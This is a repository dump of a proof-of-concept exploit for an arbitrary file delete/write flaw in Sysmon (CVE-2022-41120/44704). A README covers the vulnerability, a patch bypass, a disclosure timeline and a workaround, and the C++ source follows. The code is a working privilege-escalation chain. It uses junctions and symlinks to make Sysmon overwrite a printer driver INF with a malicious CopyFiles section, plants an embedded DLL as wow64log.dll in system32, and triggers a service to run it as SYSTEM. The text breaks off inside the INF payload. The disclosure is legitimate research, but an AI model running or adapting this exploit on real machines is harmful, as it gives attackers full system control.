Repository: Wh04m1001/SysmonEoP
Branch: main
Commit: a15e417b6252
Files: 29
Total size: 122.8 KB
Directory structure:
gitextract_zfsi2xfe/
├── README.md
├── v1/
│ ├── README.md
│ └── SysmonEoP/
│ ├── SysmonEOP.sln
│ ├── SysmonEOP.vcxproj
│ ├── SysmonEOP.vcxproj.filters
│ ├── SysmonEOP.vcxproj.user
│ ├── def.h
│ ├── main.cpp
│ ├── resource.aps
│ ├── resource.h
│ ├── resource.rc
│ ├── sysmon.idl
│ ├── sysmon_c.c
│ ├── sysmon_h.h
│ └── sysmon_s.c
└── v2/
├── README.md
└── SysmonEoP/
├── SysmonEOP.sln
├── SysmonEOP.vcxproj
├── SysmonEOP.vcxproj.filters
├── SysmonEOP.vcxproj.user
├── def.h
├── main.cpp
├── resource.aps
├── resource.h
├── resource.rc
├── sysmon.idl
├── sysmon_c.c
├── sysmon_h.h
└── sysmon_s.c
================================================
FILE CONTENTS
================================================
================================================
FILE: README.md
================================================
# SysmonEoP
Proof of Concept for arbitrary file delete/write in Sysmon (CVE-2022-41120/CVE-2022-44704)
# Vulnerability
Vulnerability is in code responsible for ClipboardChange event that can be reached through RPC.
Local users can send data to RPC server which will then be written in C:\Sysmon directory (default ArchiveDirectory) and deleted afterwards.
In version before 14.11 Sysmon would not check if directory was created by low privilege user or if it's a junction which can be abused to perform arbitrary file delete/write (kinda limited as you can only write strings) in context of NT AUTHORITY\SYSTEM user.
In version 14.11/14.12, after initial fix, Sysmon would check if directory exists and would refuse to write/delete files if directory exists.
This patch was bypassed by letting Sysmon create C:\Sysmon directory first (using CreateDirectory API) and opening handle on it before SetFileSecurity is called and change DACL's on C:\Sysmon directory.
# Exploitation
All testing was done on Windows 10.
In my PoC I have chained arbitrary file delete/write to first delete setup information file of printer driver and then write modified .INF file (as spooler service is enabled by default and low privilege users can re-install printer drivers on windows clients).
Setup information files can be abused to perform all kind of operations such service creation, registry modification, file copy etc.
I choose to copy some of printer default DLL's in c:\windows\system32 and set permissions on it so that low privilege users can modify it, this is done using CopyFiles directive (https://learn.microsoft.com/en-us/windows-hardware/drivers/install/inf-copyfiles-directive). Once file is copied it is overwritten with DLL that will spawn elevated cmd.exe process.
It is possible to abuse just arbitrary file delete for LPE by abusing windows installer behavior (trick found by [@KLINIX5](https://twitter.com/KLINIX5) and is documented by ZDI here https://www.zerodayinitiative.com/blog/2022/3/16/abusing-arbitrary-file-deletes-to-escalate-privilege-and-other-great-tricks).
# Vulnerable versions and pre-requirements
All testing was done on versions 13.34-14.12.
I don’t know exactly lowest version that is vulnerable, but I believe that versions 12.0 - 14.12 are vulnerable as ClipboardChange event was introduced in version 12.0.
In order to exploit this vulnerability events that use ArchiveDirectory should not be enabled (ClipboardChange and FileDelete I believe) as if those two are used then ArchiveDirectory will be created and have secure permissions.
# Workaround
If you are using vulnerable version and cannot update you can create ArchiveDirectory (C:\Sysmon by default) and set permissions that will only allow access to NT AUTHORITY\SYSTEM account.
# Timeline
- 2022/06/13 - Vulnerability reported to Microsoft
- 2022/06/16 - Vulnerability confirmed.
- 2022/11/08 - Patch and CVE released.
- 2022/11/08 - Bypass reported to Microsoft.
- 2022/11/11 - Microsoft cannot reproduce vulnerability, asks for different PoC.
- 2022/11/11 - I send same PoC and suggest that sysmon is either not installed on testing VM or installation was corrupted.
- 2022/11/15 - Microsoft confirmed bypass.
- 2022/11/28 - Microsoft release v14.13 that patched vulnerabilty (CVE will be released in December Patch Tuesday)
# Links & Resources
- https://itm4n.github.io/fuzzing-windows-rpc-rpcview/
- https://www.zerodayinitiative.com/blog/2022/3/16/abusing-arbitrary-file-deletes-to-escalate-privilege-and-other-great-tricks
================================================
FILE: v1/README.md
================================================
Exploit for verions before 14.11.
================================================
FILE: v1/SysmonEoP/SysmonEOP.sln
================================================
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 16
VisualStudioVersion = 16.0.30717.126
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "SysmonEOP", "SysmonEOP.vcxproj", "{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|x64 = Debug|x64
Debug|x86 = Debug|x86
Release|x64 = Release|x64
Release|x86 = Release|x86
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}.Debug|x64.ActiveCfg = Debug|x64
{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}.Debug|x64.Build.0 = Debug|x64
{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}.Debug|x86.ActiveCfg = Debug|Win32
{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}.Debug|x86.Build.0 = Debug|Win32
{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}.Release|x64.ActiveCfg = Release|x64
{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}.Release|x64.Build.0 = Release|x64
{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}.Release|x86.ActiveCfg = Release|Win32
{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}.Release|x86.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {EA809E7C-ABAC-45B5-BE5B-2F48BFC601DA}
EndGlobalSection
EndGlobal
================================================
FILE: v1/SysmonEoP/SysmonEOP.vcxproj
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<VCProjectVersion>16.0</VCProjectVersion>
<Keyword>Win32Proj</Keyword>
<ProjectGuid>{fac6a4f5-2e86-4ef0-a787-669b2a2f28af}</ProjectGuid>
<RootNamespace>SysmonEOP</RootNamespace>
<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="Shared">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<ProgramDataBaseFileName />
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
<BuildLog>
<Path />
</BuildLog>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="main.cpp" />
<ClCompile Include="sysmon_c.c" />
</ItemGroup>
<ItemGroup>
<Midl Include="sysmon.idl" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="def.h" />
<ClInclude Include="resource.h" />
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="resource.rc" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>
================================================
FILE: v1/SysmonEoP/SysmonEOP.vcxproj.filters
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Source Files">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Header Files">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
</Filter>
<Filter Include="Resource Files">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="main.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="sysmon_c.c">
<Filter>Source Files</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<Midl Include="sysmon.idl">
<Filter>Source Files</Filter>
</Midl>
</ItemGroup>
<ItemGroup>
<ClInclude Include="def.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="resource.h">
<Filter>Header Files</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="resource.rc">
<Filter>Resource Files</Filter>
</ResourceCompile>
</ItemGroup>
</Project>
================================================
FILE: v1/SysmonEoP/SysmonEOP.vcxproj.user
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup />
</Project>
================================================
FILE: v1/SysmonEoP/def.h
================================================
#include <Windows.h>
#include <winternl.h>
#include <combaseapi.h>
#include <comdef.h>
#include <stdio.h>
#include <Wbemidl.h>
#include "sysmon_h.h"
#include "resource.h"
#pragma comment(lib, "wbemuuid.lib")
#pragma comment(lib,"RpcRT4.lib")
#pragma warning(disable:4996)
struct __declspec(uuid("A6B716CB-028B-404D-B72C-50E153DD68DA")) CLSID_MSEdge_Object;
class __declspec(uuid("79e0c401-b7bc-4de5-8104-71350f3a9b67")) IGoogleUpdate : IUnknown {
public:
HRESULT CheckForUpdate(const WCHAR* guid, VOID* observer);
HRESULT Update(const WCHAR* guid, VOID* observer);
};
//Variables
wchar_t object[] = L"Global\\GLOBALROOT\\RPC Control\\CLIP-876BEE15B64B610D2505A44596ED92FBA9624DB923F9D608698BD8C8E64E4F1A";
wchar_t sysmon[] = L"C:\\SYSMON";
HANDLE hFile, hFile2,hSysmon;
//Functions*
LPWSTR Find();
void load();
BOOL AddPrinterDriverWmi();
void Trigger(LPWSTR alpc);
LPWSTR BuildPath(LPCWSTR path);
BOOL CreateJunction(HANDLE dir, LPCWSTR target);
BOOL DosDeviceSymLink(LPCWSTR object, LPCWSTR target);
BOOL DelDosDeviceSymLink(LPCWSTR object, LPCWSTR target);
BOOL DeleteJunction(HANDLE dir);
typedef struct _REPARSE_DATA_BUFFER {
ULONG ReparseTag;
USHORT ReparseDataLength;
USHORT Reserved;
union {
struct {
USHORT SubstituteNameOffset;
USHORT SubstituteNameLength;
USHORT PrintNameOffset;
USHORT PrintNameLength;
ULONG Flags;
WCHAR PathBuffer[1];
} SymbolicLinkReparseBuffer;
struct {
USHORT SubstituteNameOffset;
USHORT SubstituteNameLength;
USHORT PrintNameOffset;
USHORT PrintNameLength;
WCHAR PathBuffer[1];
} MountPointReparseBuffer;
struct {
UCHAR DataBuffer[1];
} GenericReparseBuffer;
} DUMMYUNIONNAME;
} REPARSE_DATA_BUFFER, * PREPARSE_DATA_BUFFER;
typedef struct _OBJECT_DIRECTORY_INFORMATION {
UNICODE_STRING Name;
UNICODE_STRING TypeName;
} OBJECT_DIRECTORY_INFORMATION, * POBJECT_DIRECTORY_INFORMATION;
#define STATUS_MORE_ENTRIES 0x00000105
#define STATUS_NO_MORE_ENTRIES 0x8000001A
#define IO_REPARSE_TAG_MOUNT_POINT (0xA0000003L)
typedef NTSYSAPI NTSTATUS(NTAPI* _NtCreateFile)(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock, PLARGE_INTEGER AllocationSize, ULONG FileAttributes, ULONG ShareAccess, ULONG CreateDisposition, ULONG CreateOptions, PVOID EaBuffer, ULONG EaLength);
typedef NTSYSAPI VOID(NTAPI* _RtlInitUnicodeString)(PUNICODE_STRING DestinationString, PCWSTR SourceString);
typedef NTSYSAPI NTSTATUS(NTAPI* _NtOpenDirectoryObject)(OUT PHANDLE DirectoryHandle, IN ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes);
typedef NTSYSAPI NTSTATUS(NTAPI* _NtQueryDirectoryObject)(_In_ HANDLE DirectoryHandle, _Out_opt_ PVOID Buffer, _In_ ULONG Length, _In_ BOOLEAN ReturnSingleEntry, _In_ BOOLEAN RestartScan, _Inout_ PULONG Context, _Out_opt_ PULONG ReturnLength);
typedef NTSYSCALLAPI NTSTATUS(NTAPI* _NtSetInformationFile)(HANDLE FileHandle,PIO_STATUS_BLOCK IoStatusBlock,PVOID FileInformation,ULONG Length,ULONG FileInformationClass);
_RtlInitUnicodeString pRtlInitUnicodeString;
_NtCreateFile pNtCreateFile;
_NtSetInformationFile pNtSetInformationFile;
_NtQueryDirectoryObject pNtQueryDirectoryObject;
_NtOpenDirectoryObject pNtOpenDirectoryObect;
================================================
FILE: v1/SysmonEoP/main.cpp
================================================
#include "def.h"
int wmain(int argc, wchar_t* argv[])
{
load();
LPWSTR alpc = Find();
HANDLE h1;
if (alpc == NULL) {
printf("[!] Failed to find ALPC port!\n");
return 1;
}
if (!CreateDirectory(sysmon, NULL)) {
printf("[!] Failed to create %ls directory!\n",sysmon);
return 1;
}
hSysmon = CreateFile(sysmon, FILE_WRITE_ATTRIBUTES | DELETE, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, NULL, OPEN_ALWAYS, FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT|FILE_FLAG_DELETE_ON_CLOSE, NULL);
if (hSysmon == INVALID_HANDLE_VALUE) {
printf("[!] Failed to open handle on %ls directory!\n", sysmon);
return 1;
}
DosDeviceSymLink(object, BuildPath(L"C:\\Windows\\System32\\DriverStore\\FileRepository\\prnge001.inf_amd64_1daeee8f3aa30fcb\\prnge001.inf"));
CreateJunction(hSysmon, L"\\RPC Control");
Trigger(alpc);
do {
h1 = CreateFile(L"C:\\Windows\\System32\\DriverStore\\FileRepository\\prnge001.inf_amd64_1daeee8f3aa30fcb\\prnge001.inf", GENERIC_READ, FILE_SHARE_READ|FILE_SHARE_DELETE|FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
} while (h1 != INVALID_HANDLE_VALUE);
Sleep(500);
printf("[+] Driver setup info file deleted!\n");
CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Trigger, alpc, 0, NULL);
do {
h1 = CreateFile(L"C:\\Windows\\System32\\DriverStore\\FileRepository\\prnge001.inf_amd64_1daeee8f3aa30fcb\\prnge001.inf", GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
} while (h1 == INVALID_HANDLE_VALUE);
HMODULE hm = GetModuleHandle(NULL);
HRSRC res = FindResource(hm, MAKEINTRESOURCE(IDR_DLL1), L"dll");
DWORD DllSize = SizeofResource(hm, res);
void* DllBuff = LoadResource(hm, res);
printf("[+] Driver setup info file written.\n");
if (!AddPrinterDriverWmi()) {
printf("[!] Failed to add print driver!\n");
return 1;
}
HANDLE dll;
do {
Sleep(1000);
dll = CreateFile(L"C:\\windows\\system32\\wow64log.dll", GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_DELETE | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
} while (dll == INVALID_HANDLE_VALUE);
printf("[+] DLL created!\n");
WriteFile(dll, DllBuff, DllSize, NULL, NULL);
CloseHandle(dll);
printf("[*] Triggering Edge Update service!\n");
HRESULT coini = CoInitialize(NULL);
IGoogleUpdate* updater = NULL;
HRESULT hr = CoCreateInstance(__uuidof(CLSID_MSEdge_Object), NULL, CLSCTX_LOCAL_SERVER, __uuidof(updater), (PVOID*)&updater);
DelDosDeviceSymLink(object, BuildPath(L"C:\\Windows\\System32\\DriverStore\\FileRepository\\prnge001.inf_amd64_1daeee8f3aa30fcb\\prnge001.inf"));
DeleteJunction(hSysmon);
while(!DeleteFile(L"C:\\windows\\system32\\wow64log.dll")){}
return 0;
}
void load() {
HMODULE ntdll = LoadLibraryW(L"ntdll.dll");
if (ntdll != NULL) {
pRtlInitUnicodeString = (_RtlInitUnicodeString)GetProcAddress(ntdll, "RtlInitUnicodeString");
pNtCreateFile = (_NtCreateFile)GetProcAddress(ntdll, "NtCreateFile");
pNtQueryDirectoryObject = (_NtQueryDirectoryObject)GetProcAddress(ntdll, "NtQueryDirectoryObject");
pNtOpenDirectoryObect = (_NtOpenDirectoryObject)GetProcAddress(ntdll, "NtOpenDirectoryObject");
pNtSetInformationFile = (_NtSetInformationFile)GetProcAddress(ntdll, "NtSetInformationFile");
}
if (pRtlInitUnicodeString == NULL || pNtCreateFile == NULL || pNtQueryDirectoryObject == NULL || pNtOpenDirectoryObect == NULL|| pNtSetInformationFile == NULL) {
printf("Cannot load api's %d\n", GetLastError());
exit(0);
}
}
BOOL CreateJunction(HANDLE hDir, LPCWSTR target) {
HANDLE hJunction;
DWORD cb;
wchar_t printname[] = L"";
if (hDir == INVALID_HANDLE_VALUE) {
printf("[!] HANDLE invalid!\n");
return FALSE;
}
SIZE_T TargetLen = wcslen(target) * sizeof(WCHAR);
SIZE_T PrintnameLen = wcslen(printname) * sizeof(WCHAR);
SIZE_T PathLen = TargetLen + PrintnameLen + 12;
SIZE_T Totalsize = PathLen + (DWORD)(FIELD_OFFSET(REPARSE_DATA_BUFFER, GenericReparseBuffer.DataBuffer));
PREPARSE_DATA_BUFFER Data = (PREPARSE_DATA_BUFFER)malloc(Totalsize);
Data->ReparseTag = IO_REPARSE_TAG_MOUNT_POINT;
Data->ReparseDataLength = PathLen;
Data->Reserved = 0;
Data->MountPointReparseBuffer.SubstituteNameOffset = 0;
Data->MountPointReparseBuffer.SubstituteNameLength = TargetLen;
memcpy(Data->MountPointReparseBuffer.PathBuffer, target, TargetLen + 2);
Data->MountPointReparseBuffer.PrintNameOffset = (USHORT)(TargetLen + 2);
Data->MountPointReparseBuffer.PrintNameLength = (USHORT)PrintnameLen;
memcpy(Data->MountPointReparseBuffer.PathBuffer + wcslen(target) + 1, printname, PrintnameLen + 2);
WCHAR dir[MAX_PATH] = { 0x0 };
if (DeviceIoControl(hDir, FSCTL_SET_REPARSE_POINT, Data, Totalsize, NULL, 0, &cb, NULL) != 0)
{
GetFinalPathNameByHandle(hDir, dir, MAX_PATH, 0);
printf("[+] Junction %ls -> %ls created!\n", dir, target);
free(Data);
return TRUE;
}
else
{
printf("[!] Error: %d. Exiting\n", GetLastError());
free(Data);
return FALSE;
}
}
BOOL DeleteJunction(HANDLE handle) {
REPARSE_GUID_DATA_BUFFER buffer = { 0 };
BOOL ret;
buffer.ReparseTag = IO_REPARSE_TAG_MOUNT_POINT;
DWORD cb = 0;
IO_STATUS_BLOCK io;
if (handle == INVALID_HANDLE_VALUE) {
printf("[!] HANDLE invalid!\n");
return FALSE;
}
WCHAR dir[MAX_PATH] = { 0x0 };
if (DeviceIoControl(handle, FSCTL_DELETE_REPARSE_POINT, &buffer, REPARSE_GUID_DATA_BUFFER_HEADER_SIZE, NULL, NULL, &cb, NULL)) {
GetFinalPathNameByHandle(handle, dir, MAX_PATH, 0);
printf("[+] Junction %ls deleted!\n", dir);
return TRUE;
}
else
{
printf("[!] Error: %d.\n", GetLastError());
return FALSE;
}
}
BOOL DosDeviceSymLink(LPCWSTR object, LPCWSTR target) {
if (DefineDosDevice(DDD_NO_BROADCAST_SYSTEM | DDD_RAW_TARGET_PATH, object, target)) {
printf("[+] Symlink %ls -> %ls created!\n", object, target);
return TRUE;
}
else
{
printf("error :%d\n", GetLastError());
return FALSE;
}
}
BOOL DelDosDeviceSymLink(LPCWSTR object, LPCWSTR target) {
if (DefineDosDevice(DDD_NO_BROADCAST_SYSTEM | DDD_RAW_TARGET_PATH | DDD_REMOVE_DEFINITION | DDD_EXACT_MATCH_ON_REMOVE, object, target)) {
printf("[+] Symlink %ls -> %ls deleted!\n", object, target);
return TRUE;
}
else
{
printf("error :%d\n", GetLastError());
return FALSE;
}
}
LPWSTR Find() {
HANDLE rpccontrolobj;
OBJECT_ATTRIBUTES obj;
const wchar_t rpccontrol[] = L"\\RPC Control";
UNICODE_STRING unicode_string = { 0 };
pRtlInitUnicodeString(&unicode_string, rpccontrol);
InitializeObjectAttributes(&obj, &unicode_string, 0, 0, 00);
NTSTATUS result = pNtOpenDirectoryObect(&rpccontrolobj, 0x0001 | 0x0002, &obj);
if (result == 0) {
BYTE* buffer = (BYTE*)malloc(100000);
ULONG start = 0, index = 0, bytes;
BOOLEAN restart = TRUE;
for (;;)
{
result = pNtQueryDirectoryObject(rpccontrolobj, (PBYTE)buffer, 100000, FALSE, restart, &index, &bytes);
if (result == 0)
{
POBJECT_DIRECTORY_INFORMATION objectlist = (POBJECT_DIRECTORY_INFORMATION)buffer;
for (ULONG i = 0; i < index - start; i++)
{
if (0 == wcsncmp(objectlist[i].TypeName.Buffer, L"ALPC Port", objectlist[i].TypeName.Length / sizeof(WCHAR)))
{
if (wcsstr(objectlist[i].Name.Buffer, L"syscliprpc")) {
return objectlist[i].Name.Buffer;
}
}
}
}
if (STATUS_MORE_ENTRIES == result)
{
start = index;
restart = FALSE;
continue;
}
else if (STATUS_NO_MORE_ENTRIES == 0 || (result == 0)) {
CloseHandle(rpccontrolobj);
break;
}
}
return NULL;
}
return NULL;
}
void Trigger(LPWSTR alpc)
{
RPC_STATUS status;
RPC_WSTR StringBinding;
RPC_BINDING_HANDLE Binding;
wchar_t data[] = L"; Windows Inbox Printer Drivers\n\n[Version]\nSignature=\"$Windows NT$\"\nProvider=\"Microsoft\"\nClassGUID={4D36E979-E325-11CE-BFC1-08002BE10318}\nClass=Printer\nCatalogFile=prnge001.cat\nDriverVer = 06/21/2006,10.0.19041.1\n\n\n[Manufacturer]\n\"Generic\"=Generic,NTamd64\n\n[Test.CopyFiles]\nwow64log.dll,TTY.DLL,,4\n\n[Test.CopyFiles.security]\n\"D:AI(A;;GA;;;SY)(A;;GA;;;AU)(A;;GA;;;BA)\"\n\n\n[Generic.NTamd64]\n\"Generic / Text Only\" = TTY.GPD,GenericGeneric_/_Tex8040,Generic_/_Text_Only\n\"Generic IBM Graphics 9pin\" = GENIBM9.GPD,GenericGeneric_IBM_GD35A,Generic_IBM_Graphics_9pin\n\"Generic IBM Graphics 9pin wide\" = GENIBM9W.GPD,GenericGeneric_IBM_GC7D5,Generic_IBM_Graphics_9pin_wide\n\"MS Publisher Color Printer\" = MSGENCOL.PPD,GenericMS_Publisher_25C7,MS_Publisher_Color_Printer\n\"MS Publisher Imagesetter\" = MSGENBW.PPD,GenericMS_Publisher_B397,MS_Publisher_Imagesetter\n\n\n[TTY.GPD]\nCopyFiles=@TTYRES.DLL,@TTY.INI,@TTY.DLL,@TTYUI.DLL,@TTY.GPD,@TTYUI.HLP\nCopyFiles=Test.CopyFiles\nDataFile=TTY.GPD\nCoreDriverSections=\"{D20EA372-DD35-4950-9ED8-A6335AFE79F0},UNIDRV.OEM,UNIDRV_DATA\"\n\n[GENIBM9.GPD]\nCopyFiles=@OK9IBRES.DLL,@GENIBM9.GPD\nDataFile=GENIBM9.GPD\nCoreDriverSections=\"{D20EA372-DD35-4950-9ED8-A6335AFE79F0},UNIDRV.OEM,UNIDRV_DATA\"\n\n[GENIBM9W.GPD]\nCopyFiles=@OK9IBRES.DLL,@GENIBM9W.GPD\nDataFile=GENIBM9W.GPD\nCoreDriverSections=\"{D20EA372-DD35-4950-9ED8-A6335AFE79F0},UNIDRV.OEM,UNIDRV_DATA\"\n\n[MSGENCOL.PPD]\nCopyFiles=@MSGENCOL.PPD\nDataFile=MSGENCOL.PPD\nCoreDriverSections=\"{D20EA372-DD35-4950-9ED8-A6335AFE79F1},PSCRIPT.OEM,PSCRIPT_DATA\"\n\n[MSGENBW.PPD]\nCopyFiles=@MSGENBW.PPD\nDataFile=MSGENBW.PPD\nCoreDriverSections=\"{D20EA372-DD35-4950-9ED8-A6335AFE79F1},PSCRIPT.